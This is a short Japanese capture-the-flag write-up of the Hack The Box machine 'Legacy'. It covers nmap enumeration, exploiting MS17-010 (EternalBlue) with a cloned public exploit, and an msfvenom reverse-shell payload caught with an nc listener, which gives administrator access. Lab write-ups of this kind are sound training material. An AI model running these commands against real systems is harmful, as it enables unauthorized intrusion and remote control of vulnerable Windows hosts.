Lagacyはwindowsのマシンで、難易度はeasyです。
Hack The Boxの中で非常に簡単なマシンです。
流れとしては、以下のようになっています。
1.nmapのスクリプトエンジンで、ms17-010(eternalblue)の脆弱性を特定
2.exploitを探す
3.msfvnomでペイロードを作成
4.exploitを実行してリバースシェルを成功させる
目次
1.Enumeration
nmpaでオープンポートが、139,445であることを確認
map -p- --min-rate=1000 -T4 -Pn -o ports 10.10.10.4
nmapのデフォルトスクリプトエンジンを実行(-sC オプション)
OSがWindows XPであることが分かります。
nmap -Pn -sV -sC -p 139,445,3389 -o nmap 10.10.10.4
脆弱性確認のスクリプトエンジンを実行(–script vuln)
nmap -Pn -sV --script vuln -p 139,445,3389 -o nmapVuln 10.10.10.4
nmapの結果から「ms17-010」の脆弱性が存在することが分かります。
2.Exploitation
searchsploitで、exploitが存在するか確認します。
searchsploitでは、windows XPに該当するのがなさそうなので、別のexploitをダウンロードします。
git clone https://github.com/helviojunior/MS17-010.gitリバースシェルのペイロードを作成します。
sudo msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.2 LPORT=1234 -f exe > legacy.exe
ncコマンドでリバースシェルを待ち受けます。
nc -nlvp 1234
exploitを実行します。
python send_and_execute.py 10.10.10.4 legacy.exe
リバースシェルが成功します。
3.Privilege Escalation
今回は接続できた時点で管理者権限になっていたので、Privilege Escalationは不要です。